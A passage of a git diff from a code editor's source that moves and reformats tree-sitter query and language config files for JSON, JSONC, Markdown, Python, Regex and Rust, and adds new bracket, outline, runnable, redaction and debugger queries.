to crates/grammars/src/json/overrides.scm diff --git a/crates/grammars/src/json/redactions.scm b/crates/grammars/src/json/redactions.scm new file mode 100644 index 0000000000000000000000000000000000000000..c220d0c18b79e007a6de511099254c59214ace74 --- /dev/null +++ b/crates/grammars/src/json/redactions.scm @@ -0,0 +1,11 @@ +(pair + value: (number) @redact) + +(pair + value: (string) @redact) + +(array + (number) @redact) + +(array + (string) @redact) diff --git a/crates/grammars/src/json/runnables.scm b/crates/grammars/src/json/runnables.scm new file mode 100644 index 0000000000000000000000000000000000000000..a0d95d89b577bf3f5a22b3ff6cedcd7945b4881b --- /dev/null +++ b/crates/grammars/src/json/runnables.scm @@ -0,0 +1,13 @@ +; Add support `package.json` and `composer.json` script runnable +((document + (object + (pair + key: (string + (string_content) @_name + (#eq? @_name "scripts")) + value: (object + (pair + key: (string + (string_content) @run @script)))))) + (#set! tag package-script) + (#set! tag composer-script)) diff --git a/crates/languages/src/json/textobjects.scm b/crates/grammars/src/json/textobjects.scm similarity index 100% rename from crates/languages/src/json/textobjects.scm rename to crates/grammars/src/json/textobjects.scm diff --git a/crates/grammars/src/jsonc/brackets.scm b/crates/grammars/src/jsonc/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..ac2e2ad37bfc6cd2e72323914f6975c5d3cdb60e --- /dev/null +++ b/crates/grammars/src/jsonc/brackets.scm @@ -0,0 +1,9 @@ +("[" @open + "]" @close) + +("{" @open + "}" @close) + +(("\"" @open + "\"" @close) + (#set! 
rainbow.exclude)) diff --git a/crates/languages/src/jsonc/config.toml b/crates/grammars/src/jsonc/config.toml similarity index 85% rename from crates/languages/src/jsonc/config.toml rename to crates/grammars/src/jsonc/config.toml index 85fb9e26c446ad705d9225422ae4fae29e03b708..acc0c2e13d5b0ad2df5e45e500be36c53e7c5857 100644 --- a/crates/languages/src/jsonc/config.toml +++ b/crates/grammars/src/jsonc/config.toml @@ -1,6 +1,6 @@ name = "JSONC" grammar = "jsonc" -path_suffixes = ["jsonc", "bun.lock", "devcontainer.json", "pyrightconfig.json", "tsconfig.json", "luaurc"] +path_suffixes = ["jsonc", "bun.lock", "devcontainer.json", "pyrightconfig.json", "tsconfig.json", "luaurc", "swcrc", "babelrc", "eslintrc", "stylelintrc", "jshintrc"] line_comments = ["// "] autoclose_before = ",]}" brackets = [ diff --git a/crates/languages/src/json/highlights.scm b/crates/grammars/src/jsonc/highlights.scm similarity index 99% rename from crates/languages/src/json/highlights.scm rename to crates/grammars/src/jsonc/highlights.scm index 1098320ccba78c143b43c7608b1d4e41ad5ec20d..f9b1c337358d26f08fe5b77b3a6e1a70b3f5b418 100644 --- a/crates/languages/src/json/highlights.scm +++ b/crates/grammars/src/jsonc/highlights.scm @@ -1,6 +1,7 @@ (comment) @comment (string) @string + (escape_sequence) @string.escape (pair diff --git a/crates/grammars/src/jsonc/indents.scm b/crates/grammars/src/jsonc/indents.scm new file mode 100644 index 0000000000000000000000000000000000000000..63b015c2fe74dda013e201d88ebbfe06107def4a --- /dev/null +++ b/crates/grammars/src/jsonc/indents.scm @@ -0,0 +1,5 @@ +(array + "]" @end) @indent + +(object + "}" @end) @indent diff --git a/crates/grammars/src/jsonc/injections.scm b/crates/grammars/src/jsonc/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..2f0e58eb6431515b86b6042e5828263341513e99 --- /dev/null +++ b/crates/grammars/src/jsonc/injections.scm @@ -0,0 +1,2 @@ +((comment) @injection.content + (#set! 
injection.language "comment")) diff --git a/crates/grammars/src/jsonc/outline.scm b/crates/grammars/src/jsonc/outline.scm new file mode 100644 index 0000000000000000000000000000000000000000..c7f988077767819128b6f028fbcf196dcf5a5678 --- /dev/null +++ b/crates/grammars/src/jsonc/outline.scm @@ -0,0 +1,3 @@ +(pair + key: (string + (string_content) @name)) @item diff --git a/crates/languages/src/jsonc/overrides.scm b/crates/grammars/src/jsonc/overrides.scm similarity index 97% rename from crates/languages/src/jsonc/overrides.scm rename to crates/grammars/src/jsonc/overrides.scm index 81fec9a5f57b28fc67b4781ec37df43559e21dc9..544e9876f8ea8f1d676ee21731fdcb30fc7163ec 100644 --- a/crates/languages/src/jsonc/overrides.scm +++ b/crates/grammars/src/jsonc/overrides.scm @@ -1,2 +1,3 @@ (comment) @comment.inclusive + (string) @string diff --git a/crates/grammars/src/jsonc/redactions.scm b/crates/grammars/src/jsonc/redactions.scm new file mode 100644 index 0000000000000000000000000000000000000000..c220d0c18b79e007a6de511099254c59214ace74 --- /dev/null +++ b/crates/grammars/src/jsonc/redactions.scm @@ -0,0 +1,11 @@ +(pair + value: (number) @redact) + +(pair + value: (string) @redact) + +(array + (number) @redact) + +(array + (string) @redact) diff --git a/crates/languages/src/jsonc/textobjects.scm b/crates/grammars/src/jsonc/textobjects.scm similarity index 100% rename from crates/languages/src/jsonc/textobjects.scm rename to crates/grammars/src/jsonc/textobjects.scm diff --git a/crates/languages/src/markdown-inline/config.toml b/crates/grammars/src/markdown-inline/config.toml similarity index 100% rename from crates/languages/src/markdown-inline/config.toml rename to crates/grammars/src/markdown-inline/config.toml diff --git a/crates/languages/src/markdown-inline/highlights.scm b/crates/grammars/src/markdown-inline/highlights.scm similarity index 77% rename from crates/languages/src/markdown-inline/highlights.scm rename to crates/grammars/src/markdown-inline/highlights.scm 
index 3c9f6fbcc340bd085466055c7b35551dd71b8c53..26c066ea0a0f6cc93073f6d525d44f2a6456fd49 100644 --- a/crates/languages/src/markdown-inline/highlights.scm +++ b/crates/grammars/src/markdown-inline/highlights.scm @@ -1,6 +1,9 @@ (emphasis) @emphasis.markup + (strong_emphasis) @emphasis.strong.markup + (code_span) @text.literal.markup + (strikethrough) @strikethrough.markup [ @@ -13,8 +16,18 @@ (link_label) ] @link_text.markup -(inline_link ["(" ")"] @link_uri.markup) -(image ["(" ")"] @link_uri.markup) +(inline_link + [ + "(" + ")" + ] @link_uri.markup) + +(image + [ + "(" + ")" + ] @link_uri.markup) + [ (link_destination) (uri_autolink) diff --git a/crates/languages/src/markdown-inline/injections.scm b/crates/grammars/src/markdown-inline/injections.scm similarity index 100% rename from crates/languages/src/markdown-inline/injections.scm rename to crates/grammars/src/markdown-inline/injections.scm diff --git a/crates/grammars/src/markdown/brackets.scm b/crates/grammars/src/markdown/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..5aaf93f63da3502c41b43027ee615592521c94ae --- /dev/null +++ b/crates/grammars/src/markdown/brackets.scm @@ -0,0 +1,24 @@ +("(" @open + ")" @close) + +("[" @open + "]" @close) + +("{" @open + "}" @close) + +(("\"" @open + "\"" @close) + (#set! rainbow.exclude)) + +(("`" @open + "`" @close) + (#set! rainbow.exclude)) + +(("'" @open + "'" @close) + (#set! rainbow.exclude)) + +(((fenced_code_block_delimiter) @open + (fenced_code_block_delimiter) @close) + (#set! 
rainbow.exclude)) diff --git a/crates/languages/src/markdown/config.toml b/crates/grammars/src/markdown/config.toml similarity index 98% rename from crates/languages/src/markdown/config.toml rename to crates/grammars/src/markdown/config.toml index 5e7acd230b6f191aebff609bbc1087fbff8d3909..27dd1821e414fb8e068c3c1975ec6189d80c0350 100644 --- a/crates/languages/src/markdown/config.toml +++ b/crates/grammars/src/markdown/config.toml @@ -1,6 +1,7 @@ name = "Markdown" grammar = "markdown" path_suffixes = ["md", "mdx", "mdwn", "mdc", "markdown", "MD"] +modeline_aliases = ["md"] completion_query_characters = ["-"] block_comment = { start = "", tab_size = 0 } autoclose_before = ";:.,=}])>" diff --git a/crates/languages/src/markdown/highlights.scm b/crates/grammars/src/markdown/highlights.scm similarity index 58% rename from crates/languages/src/markdown/highlights.scm rename to crates/grammars/src/markdown/highlights.scm index 707bcc0816366f5cc875c9f1197b42a2363cab99..76254c2472d98dc58a6efdccef41d9ec677a1b77 100644 --- a/crates/languages/src/markdown/highlights.scm +++ b/crates/grammars/src/markdown/highlights.scm @@ -9,7 +9,9 @@ (setext_heading) (thematic_break) ] @title.markup -(setext_heading (paragraph) @title.markup) + +(setext_heading + (paragraph) @title.markup) [ (list_marker_plus) @@ -19,11 +21,22 @@ (list_marker_parenthesis) ] @punctuation.list_marker.markup -(block_quote_marker) @punctuation.markup -(pipe_table_header "|" @punctuation.markup) -(pipe_table_row "|" @punctuation.markup) -(pipe_table_delimiter_row "|" @punctuation.markup) -(pipe_table_delimiter_cell "-" @punctuation.markup) +[ + (block_quote_marker) + (block_continuation) +] @punctuation.markup + +(pipe_table_header + "|" @punctuation.markup) + +(pipe_table_row + "|" @punctuation.markup) + +(pipe_table_delimiter_row + "|" @punctuation.markup) + +(pipe_table_delimiter_cell + "-" @punctuation.markup) [ (fenced_code_block_delimiter) @@ -31,4 +44,5 @@ ] @punctuation.embedded.markup 
(link_reference_definition) @link_text.markup + (link_destination) @link_uri.markup diff --git a/crates/languages/src/markdown/indents.scm b/crates/grammars/src/markdown/indents.scm similarity index 50% rename from crates/languages/src/markdown/indents.scm rename to crates/grammars/src/markdown/indents.scm index dc6dfa6118309c264e146a5af167327947fc6946..742100e3238b6dc7d456307762b2089bb780ac33 100644 --- a/crates/languages/src/markdown/indents.scm +++ b/crates/grammars/src/markdown/indents.scm @@ -1,3 +1,4 @@ -(list (list_item) @indent) +(list + (list_item) @indent) (list_item) @start.list_item diff --git a/crates/languages/src/markdown/injections.scm b/crates/grammars/src/markdown/injections.scm similarity index 52% rename from crates/languages/src/markdown/injections.scm rename to crates/grammars/src/markdown/injections.scm index f2b959dfdae9d5b0c11146c2f2e5509005a2fe5e..46717b28a97a2019f3bcd6b01815debccb3c3e30 100644 --- a/crates/languages/src/markdown/injections.scm +++ b/crates/grammars/src/markdown/injections.scm @@ -4,11 +4,13 @@ (code_fence_content) @injection.content) ((inline) @injection.content - (#set! injection.language "markdown-inline")) + (#set! injection.language "markdown-inline")) ((html_block) @injection.content (#set! injection.language "html")) -((minus_metadata) @injection.content (#set! injection.language "yaml")) +((minus_metadata) @injection.content + (#set! injection.language "yaml")) -((plus_metadata) @injection.content (#set! injection.language "toml")) +((plus_metadata) @injection.content + (#set! injection.language "toml")) diff --git a/crates/grammars/src/markdown/outline.scm b/crates/grammars/src/markdown/outline.scm new file mode 100644 index 0000000000000000000000000000000000000000..a4d8c586dd991f4ada1b7cffa1b2319eb79a7973 --- /dev/null +++ b/crates/grammars/src/markdown/outline.scm @@ -0,0 +1,6 @@ +(section + (atx_heading + . + (_) @context + . 
+ (_) @name)) @item diff --git a/crates/grammars/src/markdown/textobjects.scm b/crates/grammars/src/markdown/textobjects.scm new file mode 100644 index 0000000000000000000000000000000000000000..c84914b2409dd53c27e22c33d8ca9771b699f48d --- /dev/null +++ b/crates/grammars/src/markdown/textobjects.scm @@ -0,0 +1,3 @@ +(section + (atx_heading) + (_)* @class.inside) @class.around diff --git a/crates/grammars/src/python/brackets.scm b/crates/grammars/src/python/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..5abcf6bdd43624f625e3c08444701fa67311c00f --- /dev/null +++ b/crates/grammars/src/python/brackets.scm @@ -0,0 +1,12 @@ +("(" @open + ")" @close) + +("[" @open + "]" @close) + +("{" @open + "}" @close) + +(((string_start) @open + (string_end) @close) + (#set! rainbow.exclude)) diff --git a/crates/languages/src/python/config.toml b/crates/grammars/src/python/config.toml similarity index 98% rename from crates/languages/src/python/config.toml rename to crates/grammars/src/python/config.toml index d96a5ea5fefd0814c4b0787251e5cf6e4c166d5e..0c2072393bf6cc1db6b152d80779cd7c81af1a7e 100644 --- a/crates/languages/src/python/config.toml +++ b/crates/grammars/src/python/config.toml @@ -2,6 +2,7 @@ name = "Python" grammar = "python" path_suffixes = ["py", "pyi", "mpy"] first_line_pattern = '^#!.*((\bpython[0-9.]*\b)|(\buv run\b))' +modeline_aliases = ["py"] line_comments = ["# "] autoclose_before = ";:.,=}])>" brackets = [ @@ -35,4 +36,3 @@ decrease_indent_patterns = [ { pattern = "^\\s*except\\b.*:\\s*(#.*)?", valid_after = ["try", "except"] }, { pattern = "^\\s*finally\\b.*:\\s*(#.*)?", valid_after = ["try", "except", "else"] }, ] -import_path_strip_regex = "/__init__\\.py$" diff --git a/crates/grammars/src/python/debugger.scm b/crates/grammars/src/python/debugger.scm new file mode 100644 index 0000000000000000000000000000000000000000..8c241f8cae0e4c1e2ea39311dd86fda2ba6978dc --- /dev/null +++ b/crates/grammars/src/python/debugger.scm @@ -0,0 
+1,97 @@ +(identifier) @debug-variable +(#eq? @debug-variable "self") + +(assignment + left: (identifier) @debug-variable) + +(assignment + left: (pattern_list + (identifier) @debug-variable)) + +(assignment + left: (tuple_pattern + (identifier) @debug-variable)) + +(augmented_assignment + left: (identifier) @debug-variable) + +(for_statement + left: (identifier) @debug-variable) + +(for_statement + left: (pattern_list + (identifier) @debug-variable)) + +(for_statement + left: (tuple_pattern + (identifier) @debug-variable)) + +(for_in_clause + left: (identifier) @debug-variable) + +(for_in_clause + left: (pattern_list + (identifier) @debug-variable)) + +(for_in_clause + left: (tuple_pattern + (identifier) @debug-variable)) + +(as_pattern + (identifier) @debug-variable) + +(binary_operator + left: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(binary_operator + right: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(comparison_operator + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(list + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(tuple + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(set + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(subscript + value: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(attribute + object: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(return_statement + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(parenthesized_expression + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(argument_list + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(if_statement + condition: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(while_statement + condition: (identifier) @debug-variable + (#not-match? 
@debug-variable "^[A-Z]")) + +(block) @debug-scope + +(module) @debug-scope diff --git a/crates/languages/src/python/highlights.scm b/crates/grammars/src/python/highlights.scm similarity index 60% rename from crates/languages/src/python/highlights.scm rename to crates/grammars/src/python/highlights.scm index f15b3a0e2b03d9c913627b319aff9bca6bb8708e..87283aaa799a15ea188f3427b4277e9eaba517c1 100644 --- a/crates/languages/src/python/highlights.scm +++ b/crates/grammars/src/python/highlights.scm @@ -1,6 +1,8 @@ ; Identifier naming conventions; these "soft conventions" should stay at the top of the file as they're often overridden (identifier) @variable -(attribute attribute: (identifier) @property) + +(attribute + attribute: (identifier) @property) ; CamelCase for classes ((identifier) @type.class @@ -10,45 +12,56 @@ ((identifier) @constant (#match? @constant "^_*[A-Z][A-Z0-9_]*$")) -(type (identifier) @type) -(generic_type (identifier) @type) +(type + (identifier) @type) + +(generic_type + (identifier) @type) + (comment) @comment + (string) @string + (escape_sequence) @string.escape ; Type alias -(type_alias_statement "type" @keyword) +(type_alias_statement + "type" @keyword) ; TypeVar with constraints in type parameters (type - (tuple (identifier) @type) -) + (tuple + (identifier) @type)) ; Forward references (type - (string) @type -) - + (string) @type) ; Function calls - (call - function: (attribute attribute: (identifier) @function.method.call)) + function: (attribute + attribute: (identifier) @function.method.call)) + (call function: (identifier) @function.call) -(decorator "@" @punctuation.special) +(decorator + "@" @punctuation.special) + (decorator "@" @punctuation.special [ (identifier) @function.decorator - (attribute attribute: (identifier) @function.decorator) - (call function: (identifier) @function.decorator.call) - (call (attribute attribute: (identifier) @function.decorator.call)) + (attribute + attribute: (identifier) @function.decorator) + (call + 
function: (identifier) @function.decorator.call) + (call + (attribute + attribute: (identifier) @function.decorator.call)) ]) ; Function and class definitions - (function_definition name: (identifier) @function.definition) @@ -69,15 +82,15 @@ ; Function arguments (function_definition parameters: (parameters - [ - (identifier) @variable.parameter; Simple parameters + [ + (identifier) @variable.parameter ; Simple parameters (typed_parameter (identifier) @variable.parameter) ; Typed parameters (default_parameter name: (identifier) @variable.parameter) ; Default parameters (typed_default_parameter name: (identifier) @variable.parameter) ; Typed default parameters - ])) + ])) ; Keyword arguments (call @@ -86,28 +99,30 @@ name: (identifier) @function.kwargs))) ; Class definitions and calling: needs to come after the regex matching above - (class_definition name: (identifier) @type.class.definition) (class_definition superclasses: (argument_list - (identifier) @type.class.inheritance)) + (identifier) @type.class.inheritance)) (call function: (identifier) @type.class.call (#match? @type.class.call "^_*[A-Z][A-Za-z0-9_]*$")) ; Builtins - ((call function: (identifier) @function.builtin) - (#any-of? - @function.builtin - "abs" "all" "any" "ascii" "bin" "bool" "breakpoint" "bytearray" "bytes" "callable" "chr" "classmethod" "compile" "complex" "delattr" "dict" "dir" "divmod" "enumerate" "eval" "exec" "filter" "float" "format" "frozenset" "getattr" "globals" "hasattr" "hash" "help" "hex" "id" "input" "int" "isinstance" "issubclass" "iter" "len" "list" "locals" "map" "max" "memoryview" "min" "next" "object" "oct" "open" "ord" "pow" "print" "property" "range" "repr" "reversed" "round" "set" "setattr" "slice" "sorted" "staticmethod" "str" "sum" "super" "tuple" "type" "vars" "zip" "__import__")) + (#any-of? 
@function.builtin + "abs" "all" "any" "ascii" "bin" "bool" "breakpoint" "bytearray" "bytes" "callable" "chr" + "classmethod" "compile" "complex" "delattr" "dict" "dir" "divmod" "enumerate" "eval" "exec" + "filter" "float" "format" "frozenset" "getattr" "globals" "hasattr" "hash" "help" "hex" "id" + "input" "int" "isinstance" "issubclass" "iter" "len" "list" "locals" "map" "max" "memoryview" + "min" "next" "object" "oct" "open" "ord" "pow" "print" "property" "range" "repr" "reversed" + "round" "set" "setattr" "slice" "sorted" "staticmethod" "str" "sum" "super" "tuple" "type" + "vars" "zip" "__import__")) ; Literals - [ (true) (false) @@ -124,10 +139,11 @@ ] @number ; Self references - [ - (parameters (identifier) @variable.special) - (attribute (identifier) @variable.special) + (parameters + (identifier) @variable.special) + (attribute + (identifier) @variable.special) (#any-of? @variable.special "self" "cls") ] @@ -152,37 +168,57 @@ ; Docstrings. ([ - (expression_statement (assignment)) + (expression_statement + (assignment)) (type_alias_statement) ] -. (expression_statement (string) @string.doc)+) + . + (expression_statement + (string) @string.doc)+) (module - .(expression_statement (string) @string.doc)+) + . + (expression_statement + (string) @string.doc)+) (class_definition - body: (block .(expression_statement (string) @string.doc)+)) + body: (block + . + (expression_statement + (string) @string.doc)+)) (function_definition "async"? "def" name: (_) (parameters)? - body: (block .(expression_statement (string) @string.doc)+)) + body: (block + . + (expression_statement + (string) @string.doc)+)) (class_definition body: (block - . (comment) @comment* - . (expression_statement (string) @string.doc)+)) + . + (comment) @comment* + . + (expression_statement + (string) @string.doc)+)) (module - . (comment) @comment* - . (expression_statement (string) @string.doc)+) + . + (comment) @comment* + . 
+ (expression_statement + (string) @string.doc)+) (class_definition body: (block - (expression_statement (assignment)) - . (expression_statement (string) @string.doc)+)) + (expression_statement + (assignment)) + . + (expression_statement + (string) @string.doc)+)) (class_definition body: (block @@ -190,9 +226,11 @@ name: (identifier) @function.method.constructor (#eq? @function.method.constructor "__init__") body: (block - (expression_statement (assignment)) - . (expression_statement (string) @string.doc)+)))) - + (expression_statement + (assignment)) + . + (expression_statement + (string) @string.doc)+)))) [ "-" @@ -286,18 +324,23 @@ "lambda" ] @keyword.definition -(decorator (identifier) @attribute.builtin +(decorator + (identifier) @attribute.builtin (#any-of? @attribute.builtin "classmethod" "staticmethod" "property")) ; Builtin types as identifiers [ (call function: (identifier) @type.builtin) - (type (identifier) @type.builtin) - (generic_type (identifier) @type.builtin) + (type + (identifier) @type.builtin) + (generic_type + (identifier) @type.builtin) ; also check if type binary operator left identifier for union types (type (binary_operator left: (identifier) @type.builtin)) - (#any-of? @type.builtin "bool" "bytearray" "bytes" "complex" "dict" "float" "frozenset" "int" "list" "memoryview" "object" "range" "set" "slice" "str" "tuple") + (#any-of? 
@type.builtin + "bool" "bytearray" "bytes" "complex" "dict" "float" "frozenset" "int" "list" "memoryview" + "object" "range" "set" "slice" "str" "tuple") ] diff --git a/crates/languages/src/python/indents.scm b/crates/grammars/src/python/indents.scm similarity index 78% rename from crates/languages/src/python/indents.scm rename to crates/grammars/src/python/indents.scm index 3d4c1cc9c4260d4e925cc373662ae5ca3b82e124..9361aa7158725b22e40040e7d730d2693c688c97 100644 --- a/crates/languages/src/python/indents.scm +++ b/crates/grammars/src/python/indents.scm @@ -1,17 +1,37 @@ -(_ "[" "]" @end) @indent -(_ "{" "}" @end) @indent -(_ "(" ")" @end) @indent +(_ + "[" + "]" @end) @indent + +(_ + "{" + "}" @end) @indent + +(_ + "(" + ")" @end) @indent (function_definition) @start.def + (class_definition) @start.class + (if_statement) @start.if + (for_statement) @start.for + (while_statement) @start.while + (with_statement) @start.with + (match_statement) @start.match + (try_statement) @start.try + (elif_clause) @start.elif + (else_clause) @start.else + (except_clause) @start.except + (finally_clause) @start.finally + (case_clause) @start.case diff --git a/crates/languages/src/python/injections.scm b/crates/grammars/src/python/injections.scm similarity index 100% rename from crates/languages/src/python/injections.scm rename to crates/grammars/src/python/injections.scm diff --git a/crates/grammars/src/python/outline.scm b/crates/grammars/src/python/outline.scm new file mode 100644 index 0000000000000000000000000000000000000000..c335eef46545fcc0b493e66c780b6ecf839bd791 --- /dev/null +++ b/crates/grammars/src/python/outline.scm @@ -0,0 +1,10 @@ +(decorator) @annotation + +(class_definition + "class" @context + name: (identifier) @name) @item + +(function_definition + "async"? 
@context + "def" @context + name: (_) @name) @item diff --git a/crates/languages/src/python/overrides.scm b/crates/grammars/src/python/overrides.scm similarity index 97% rename from crates/languages/src/python/overrides.scm rename to crates/grammars/src/python/overrides.scm index 81fec9a5f57b28fc67b4781ec37df43559e21dc9..544e9876f8ea8f1d676ee21731fdcb30fc7163ec 100644 --- a/crates/languages/src/python/overrides.scm +++ b/crates/grammars/src/python/overrides.scm @@ -1,2 +1,3 @@ (comment) @comment.inclusive + (string) @string diff --git a/crates/grammars/src/python/runnables.scm b/crates/grammars/src/python/runnables.scm new file mode 100644 index 0000000000000000000000000000000000000000..3480d4a81017605da2f7cd473595d339f5d522a8 --- /dev/null +++ b/crates/grammars/src/python/runnables.scm @@ -0,0 +1,108 @@ +; subclasses of unittest.TestCase or TestCase +((class_definition + name: (identifier) @run @_unittest_class_name + superclasses: (argument_list + [ + (identifier) @_superclass + (attribute + (identifier) @_superclass) + ]) + (#eq? @_superclass "TestCase")) @_python-unittest-class + (#set! tag python-unittest-class)) + +; test methods whose names start with `test` in a TestCase +(class_definition + name: (identifier) @_unittest_class_name + superclasses: (argument_list + [ + (identifier) @_superclass + (attribute + (identifier) @_superclass) + ]) + (#eq? @_superclass "TestCase") + body: (block + (function_definition + name: (identifier) @run @_unittest_method_name + (#match? @_unittest_method_name "^test.*")) @_python-unittest-method + (#set! tag python-unittest-method))) + +; pytest functions +((module + (function_definition + name: (identifier) @run @_pytest_method_name + (#match? @_pytest_method_name "^test_")) @_python-pytest-method) + (#set! tag python-pytest-method)) + +; decorated pytest functions +((module + (decorated_definition + (decorator)+ @_decorator + definition: (function_definition + name: (identifier) @run @_pytest_method_name + (#match? 
@_pytest_method_name "^test_"))) @_python-pytest-method) + (#set! tag python-pytest-method)) + +; pytest classes +(module + (class_definition + name: (identifier) @run @_pytest_class_name + (#match? @_pytest_class_name "^Test")) + (#set! tag python-pytest-class)) + +; decorated pytest classes +(module + (decorated_definition + (decorator)+ @_decorator + definition: (class_definition + name: (identifier) @run @_pytest_class_name + (#match? @_pytest_class_name "^Test"))) + (#set! tag python-pytest-class)) + +; pytest class methods +(module + (class_definition + name: (identifier) @_pytest_class_name + (#match? @_pytest_class_name "^Test") + body: (block + [ + (decorated_definition + (decorator)+ @_decorator + definition: (function_definition + name: (identifier) @run @_pytest_method_name + (#match? @_pytest_method_name "^test_"))) + (function_definition + name: (identifier) @run @_pytest_method_name + (#match? @_pytest_method_name "^test")) + ] @_python-pytest-method) + (#set! tag python-pytest-method))) + +; decorated pytest class methods +(module + (decorated_definition + (decorator)+ @_decorator + definition: (class_definition + name: (identifier) @_pytest_class_name + (#match? @_pytest_class_name "^Test") + body: (block + [ + (decorated_definition + (decorator)+ @_decorator + definition: (function_definition + name: (identifier) @run @_pytest_method_name + (#match? @_pytest_method_name "^test_"))) + (function_definition + name: (identifier) @run @_pytest_method_name + (#match? @_pytest_method_name "^test")) + ] @_python-pytest-method) + (#set! tag python-pytest-method)))) + +; module main method +(module + (if_statement + condition: (comparison_operator + (identifier) @run @_lhs + operators: "==" + (string) @_rhs) + (#eq? @_lhs "__name__") + (#match? @_rhs "^[\"']__main__[\"']$") + (#set! 
tag python-module-main-method))) diff --git a/crates/grammars/src/python/semantic_token_rules.json b/crates/grammars/src/python/semantic_token_rules.json new file mode 100644 index 0000000000000000000000000000000000000000..b73bae962fe00f1ffde22852d7809d6d8228af63 --- /dev/null +++ b/crates/grammars/src/python/semantic_token_rules.json @@ -0,0 +1,15 @@ +[ + { + "token_type": "selfParameter", + "style": ["variable.special"] + }, + { + "token_type": "clsParameter", + "style": ["variable.special"] + }, + // ty specific + { + "token_type": "builtinConstant", + "style": ["constant.builtin"] + } +] diff --git a/crates/languages/src/python/textobjects.scm b/crates/grammars/src/python/textobjects.scm similarity index 100% rename from crates/languages/src/python/textobjects.scm rename to crates/grammars/src/python/textobjects.scm diff --git a/crates/grammars/src/regex/brackets.scm b/crates/grammars/src/regex/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..3779d8514bdee9fed0abe1f14b98851754decd8c --- /dev/null +++ b/crates/grammars/src/regex/brackets.scm @@ -0,0 +1,8 @@ +("(" @open + ")" @close) + +("[" @open + "]" @close) + +("{" @open + "}" @close) diff --git a/crates/languages/src/regex/config.toml b/crates/grammars/src/regex/config.toml similarity index 100% rename from crates/languages/src/regex/config.toml rename to crates/grammars/src/regex/config.toml diff --git a/crates/languages/src/regex/highlights.scm b/crates/grammars/src/regex/highlights.scm similarity index 93% rename from crates/languages/src/regex/highlights.scm rename to crates/grammars/src/regex/highlights.scm index b5adecf472941154ae84d2acb62fea218859bbea..b0df4b98be08214554dd58a1dcfd1aab0b06586b 100644 --- a/crates/languages/src/regex/highlights.scm +++ b/crates/grammars/src/regex/highlights.scm @@ -51,5 +51,6 @@ (character_class [ "^" @operator.regex - (class_range "-" @operator.regex) + (class_range + "-" @operator.regex) ]) diff --git 
a/crates/grammars/src/rust/brackets.scm b/crates/grammars/src/rust/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..9d78bb11116a0cbff542c721596ec6f8fc92d0cb --- /dev/null +++ b/crates/grammars/src/rust/brackets.scm @@ -0,0 +1,23 @@ +("(" @open + ")" @close) + +("[" @open + "]" @close) + +("{" @open + "}" @close) + +("<" @open + ">" @close) + +(closure_parameters + "|" @open + "|" @close) + +(("\"" @open + "\"" @close) + (#set! rainbow.exclude)) + +(("'" @open + "'" @close) + (#set! rainbow.exclude)) diff --git a/crates/languages/src/rust/config.toml b/crates/grammars/src/rust/config.toml similarity index 92% rename from crates/languages/src/rust/config.toml rename to crates/grammars/src/rust/config.toml index 826a219e9868a3f76a063efe8c91cec0be14c2da..f739b370f4b5c3fe7bc53f4818ffabedfa1bbd0b 100644 --- a/crates/languages/src/rust/config.toml +++ b/crates/grammars/src/rust/config.toml @@ -1,6 +1,7 @@ name = "Rust" grammar = "rust" path_suffixes = ["rs"] +modeline_aliases = ["rs", "rustic"] line_comments = ["// ", "/// ", "//! "] autoclose_before = ";:.,=}])>" brackets = [ @@ -17,5 +18,3 @@ brackets = [ collapsed_placeholder = " /* ... 
*/ " debuggers = ["CodeLLDB", "GDB"] documentation_comment = { start = "/*", prefix = "* ", end = "*/", tab_size = 1 } -ignored_import_segments = ["crate", "super"] -import_path_strip_regex = "/(lib|mod)\\.rs$" diff --git a/crates/grammars/src/rust/debugger.scm b/crates/grammars/src/rust/debugger.scm new file mode 100644 index 0000000000000000000000000000000000000000..3c7195796feb41a771ec8071d78bea60efb61fd9 --- /dev/null +++ b/crates/grammars/src/rust/debugger.scm @@ -0,0 +1,85 @@ +(metavariable) @debug-variable + +(parameter + (identifier) @debug-variable) + +(self) @debug-variable + +(static_item + (identifier) @debug-variable) + +(const_item + (identifier) @debug-variable) + +(let_declaration + pattern: (identifier) @debug-variable) + +(let_condition + (identifier) @debug-variable) + +(match_arm + (identifier) @debug-variable) + +(for_expression + (identifier) @debug-variable) + +(closure_parameters + (identifier) @debug-variable) + +(assignment_expression + (identifier) @debug-variable) + +(field_expression + (identifier) @debug-variable) + +(binary_expression + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(reference_expression + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(array_expression + (identifier) @debug-variable) + +(tuple_expression + (identifier) @debug-variable) + +(return_expression + (identifier) @debug-variable) + +(await_expression + (identifier) @debug-variable) + +(try_expression + (identifier) @debug-variable) + +(index_expression + (identifier) @debug-variable) + +(range_expression + (identifier) @debug-variable) + +(unary_expression + (identifier) @debug-variable) + +(if_expression + (identifier) @debug-variable) + +(while_expression + (identifier) @debug-variable) + +(parenthesized_expression + (identifier) @debug-variable) + +(arguments + (identifier) @debug-variable + (#not-match? 
